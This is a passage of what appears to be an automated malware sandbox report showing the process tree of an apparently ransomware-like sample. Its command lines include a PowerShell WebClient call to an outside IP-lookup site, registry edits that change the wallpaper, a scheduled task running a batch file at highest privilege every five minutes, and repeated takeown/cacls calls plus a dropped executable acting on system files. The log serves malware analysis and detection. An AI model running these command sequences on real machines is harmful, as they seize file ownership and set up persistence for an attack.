  - Executes dropped EXE
  - NTFS ADS
  - Suspicious use of WriteProcessMemory
  PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\ul3b6mJx.txt"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1544
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2496
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\qdLhRsJo.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:220
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3644
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\iTranQWH.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4336
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\iTranQWH.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:4236
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:2188
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:3912
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WfP32FhN.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4184
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\WfP32FhN.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4208
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\b6jB6Xmr.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5024
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\b6jB6Xmr.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:4028
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:3480
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:2492
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:904
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:4092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:4224
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1616
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4040
    - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH64.exe
        
        h46yIQkH.exe -accepteula "classes.jsa" -nobanner
        5⤵
        Drops file in Drivers directory
        Executes dropped EXE
        Sets service image path in registry
        Enumerates connected drives
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: LoadsDriver
        Suspicious use of AdjustPrivilegeToken
        
        PID:4892
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa""
  2⤵
  PID:2768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jre1.8.0_66\bin\server\classes.jsa"
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "classes.jsa" -nobanner
    3⤵
    PID:4260
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "classes.jsa" -nobanner
      4⤵
      Executes dropped EXE
      PID:3032
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1692
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\ProgramData\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:2592
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:4012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOPrivate\UpdateStore\store.db"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5040
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "store.db" -nobanner
    3⤵
    PID:4296
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:764
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4220
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""
  2⤵
  PID:2784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3812
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:1356
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2096
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2104
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""
  2⤵
  PID:4812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4236
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:5076
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:808
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Security\BrowserCore\manifest.json""
  2⤵
  PID:3768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G Admin:F /C
    3⤵
    PID:4316
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Security\BrowserCore\manifest.json"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "manifest.json" -nobanner
    3⤵
    PID:1224
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "manifest.json" -nobanner
      4⤵
      Executes dropped EXE
      PID:5024
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4440
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:2340
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:1640
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4704
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:2256
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:3932
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:3032
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:2884
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2008
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Users\All Users\USOPrivate\UpdateStore\store.db""
  2⤵
  PID:4324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\USOPrivate\UpdateStore\store.db" /E /G Admin:F /C
    3⤵
    PID:400
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\USOPrivate\UpdateStore\store.db"
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "store.db" -nobanner
    3⤵
    PID:2568
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "store.db" -nobanner
      4⤵
      Executes dropped EXE
      PID:3124
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4228
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui""
  2⤵
  PID:4520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4256
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2896
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1260
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1444
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui""
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4308
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:2116
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2780
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1556
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui""
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:4388
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4748
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:3060
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:4440
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui""
  2⤵
  PID:4788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3636
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4704
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3476
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4208
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""
  2⤵
  PID:2224
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C
    3⤵
    PID:2312
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
    3⤵
    PID:3020
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner
      4⤵
      Executes dropped EXE
      PID:4352
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2768
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui""
  2⤵
  PID:4932
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3280
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4428
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:4916
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:2160
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3448
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui""
  2⤵
  PID:4228
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\it-IT\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3728
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3812
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2080
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""
  2⤵
  PID:1488
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"
    3⤵
    PID:288
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3624
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3120
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:4424
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""
  2⤵
  PID:3452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C
    3⤵
    PID:1556
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2096
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe" -nobanner
    3⤵
    PID:3228
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe" -nobanner
      4⤵
      Executes dropped EXE
      PID:808
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:5064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui""
  2⤵
  PID:1788
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1500
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoAcq.dll.mui"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:5044
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:3340
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:5024
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:1224
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui""
  2⤵
  PID:2028
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui" /E /G Admin:F /C
    3⤵
    PID:4032
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\PhotoAcq.dll.mui"
    3⤵
    PID:4380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
    3⤵
    PID:4280
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "PhotoAcq.dll.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:3700
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:2840
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui""
  2⤵
  PID:3480
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:4768
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
      PID:1712
- - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
    h46yIQkH.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    - Executes dropped EXE
    PID:3536
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2mBXJAI0.bat" "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui""
  2⤵
  PID:3032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\ja-JP\ImagingDevices.exe.mui"
    3⤵
    - Modifies file permissions
    PID:2268
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
    3⤵
    PID:1604
  - - C:\Users\Admin\AppData\Local\Temp\h46yIQkH.exe
      h46yIQkH.exe -accepteula "ImagingDevices.exe.mui" -nobanner
      4⤵
      Executes dropped EXE
